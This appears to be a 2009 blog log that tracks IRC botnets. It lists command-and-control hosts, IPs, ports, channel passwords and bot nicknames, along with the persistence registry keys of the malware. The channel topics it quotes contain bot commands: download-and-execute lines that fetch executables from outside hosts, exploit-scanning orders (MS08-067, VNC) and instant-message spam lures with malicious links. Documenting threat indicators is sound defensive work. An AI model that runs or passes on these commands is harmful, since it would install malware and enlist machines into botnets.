Friday, August 28, 2009

tl6.welovewarez.com ( MS08-067 ) ( ALUCARD )

tl6.welovewarez.com DNS_TYPE_A 85.17.141.52
85.17.141.52:6700

Nick: [00|AUT|XP|411848]
Username: SP3-416
Joined Channel: ##!who!## with Password 101#
Channel Topic for Channel ##!who!##: ".sftp welovewarez.com 21 wat l0l1 SCUM.EXE|.asc -S -s|.asc svrsvc_ESP_SP2 100 5 0 148.245.x.x -r -s"

Autostart Path
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run
HKLM\​SYSTEM\​CurrentControlSet\​Control\​SafeBoot\​Minimal
HKLM\​SYSTEM\​CurrentControlSet\​Control\​SafeBoot\​Network
Windows automatic updates = "C:\​WINDOWS\​system\​iexplorer.exe"

Sunday, August 23, 2009

dddd.burimche.net (burimi)

dddd.burimche.net
87.105.154.165:4244

MODE [00|USA|650342] -ix
JOIN ##bb## bole

NICK [00|USA|650342]
USER XP-0248 * 0 :SSC-19116644F03

PASS letmein
NICK [00|USA|200623]
USER XP-6975 * 0 :COMPUTERNAME
Topic is '.msn.stop|.msn.msg new ha ha http://www.fakiratu.com/image.php?='
Set by C-RDP on Sun Aug 23 20:37:36

Auto Startup Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows UDP Control Center = "fxstaller.exe"

1033 TCP fxstaller.exe (%Windir%\fxstaller.exe)
1034 TCP fxstaller.exe (%Windir%\fxstaller.exe

69.64.50.107

69.64.50.107:6667
NICK COMPUTERNAME778
USER UserName ZM ZM COMPUTERNAME
JOIN #phcrulez
NICK COMPUTERNAME859

Autostart Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
WinLogon = "%Windir%\svhosr.exe"
1036 TCP svhosr.exe (%Windir%\svhosr.exe

Saturday, August 22, 2009

65.23.159.69 (x)

65.23.159.69:38722
User Name: XP-8703
Real Name: MICHAEL
Password: test
Nick Name: [USA|00|P|39732]
Non RFC Conform: 1
Channel
Name: #test
Password: test

Topic Deleted: :.msn.sendzip OMG is this you? |.aim.msg EW! look at this picture of you I found http://allyepic.com/Picture004.jpg |.triton.msg LOL http://allyepic.com/Picture004.jpg

Autostart path
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Firewall
Key:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorized
Applications\List
Value: C:\10239953.exe
Data: C:\10239953.exe:*:Enabled:svchosts

Friday, August 21, 2009

irc.tiklabosal.net (aBoLt)

*** IP of : 95.168.175.87 host irc.tiklabosal.net
95.168.175.87:6667
Channels
USERHOST USA|9478145
JOIN #Kr@L PASS: !B
JOIN #M3ist3R
MODE USA|9478145 -x+i
Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
.download http://www.tiklabosal.net/kral.exe c:\kral.exe 1 | aBoLt Siker xD

Autostart Path
HKCU\​Software\​Microsoft\​Windows\​CurrentVersion\Run\
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\Run\
Internet Security Service = "expllorer.exe"
C:\WINDOWS\system32\expllorer.exe

sip4.voipkosovasite.com (BURIMI GAY NET IS BACK)

sip4.voipkosovasite.com
82.114.87.46:1868

MODE [00|USA|409999] -ix
JOIN #!a!
MODE [00|USA|409999] -ix
JOIN #!a!
Topic
is
'.msn.stop|.msn.msg all models photo news? :D
http://pisi.freewebhostx.com/photos.php?='
.r.getfile http://filanfisteku.fi.ohost.de/bnr.jpg c:/ssdd.exe 1 -s

-irc.foonet.com- *** Notice -- l (auth@18076492.BE3D884F.78F63BB0.IP) [bobsmith] is now a network administrator (N)

Autostart path
HKCU\​Software\​Microsoft\​Windows\​CurrentVersion\Run\
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\Run\
Framework module library = "C:\WINDOWS\system32\infocard.exe"

Wednesday, August 19, 2009

net.anddos.co.uk (anddos)

net.anddos.co.uk DNS_TYPE_A 94.75.216.31
94.75.216.31:6667

MODE [00|USA|XP|SP3]-3806 -i
JOIN #120 bforce

Nick: [00|AUT|XP|SP3]-2415
Username: xyrbyc
Joined Channel: #120 with Password bforce
Channel Topic for Channel #120: ".find vnc-5900 60 3 0 189.x.x.x"
Private Message to Channel #120: "vnc-5900 for 0 minutes 5 delay 60 threads"
.dl http://94.75.216.31:85/~anddos/120c c:\120c.exe 1

Auto Startup
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\Run\
Intranet = "winvs.exe"

Thursday, August 13, 2009

bot.sohbetodasi.info (Cod)

*** IP of : 84.201.14.35 host bot.sohbetodasi.info

84.201.14.35:6667

NICK USA|4833514
USER vkqsmeu 0 0 :USA|4833514
USERHOST USA|4833514
MODE USA|4833514 -x+i
JOIN ##scan##
NOTICE USA|4833514 :.VERSION mIRC v6.20 Khaled Mardam-Bey.
NICK USA|4748511
USER wnscqtc 0 0 :USA|4748511
* Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
Set by Cod on Fri Aug 14 04:06:33
.h download http://www.azginkizlar.net/syn.exe c:\syn.exe 1

Ports C:\WINDOWS\system32\msq23.exe
113 TCP msq23.exe (%System%\msq23.exe)
1053 TCP msq23.exe (%System%\msq23.exe)
1054 TCP msq23.exe (%System%\msq23.exe)
1055 TCP msq23.exe (%System%\msq23.exe)

Wednesday, August 12, 2009

irc.chatcafe.net

219.90.118.136:6667

User Name: kkcwihso
Host Name: "fo0.net"
Server Name:
Real Name: kkcwihso
Nick Name: raGe|AVMKKecdLc
Channel
# Name: #skynet
# Topic Deleted: :.xpl 93 3 190.x.x.x 2 0

94.75.216.31 (Anddos) botnet

94.75.216.31:6667
Nick: [nLh-VNC]ewuowy
Username: qtykph
Joined Channel: #dbot with Password pass
Channel Topic for Channel #dbot: ".h download http://www.sevgideyim.com/resimlerim.exe c:\sdffd.exe 1 "
Private Message to Channel #dbot: "RAGE: file running: 128 KB."
Private Message to Channel #dbot: "Samuray ^C13Anan\xfd sikkkkeeeeRimmmmmm G\xf6t\xfcnden"

channel: #ohai
Password: 0day
Topic Deleted: :.dl http://94.75.216.31:85/~anddos/rap/lsass3.exe c:\lsass3.exe 1

Channel list
#asn2 40
#asn3 1
#dbot 43 fuck off
#asn3b 2 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#dci-test2 1
#asnre 1 .download .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#ohai2 21 .dl http://94.75.216.31:85/~anddos/dbot.exe c:\dbot.exe 1
#narod 2 .ver
#test1 30
#imbot4 1
#netapi 5
#dci 14
#asn 1 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#vnc 1
#dci-test 5
#Samuray 1

cod.sohbetodasi.info

84.201.14.35:6667
Nick: [N]ktmfudxx
Username: TMR
Joined Channel: ##msn##
Channel Topic for Channel ##msn##: "p umar\xfdm be\xf0enirsin.. al bakal\xfdm"

203.86.84.215 (ms08-067) botnet

203.86.84.215:9595
Channel: ##esp, ##rus


Powered by Blogger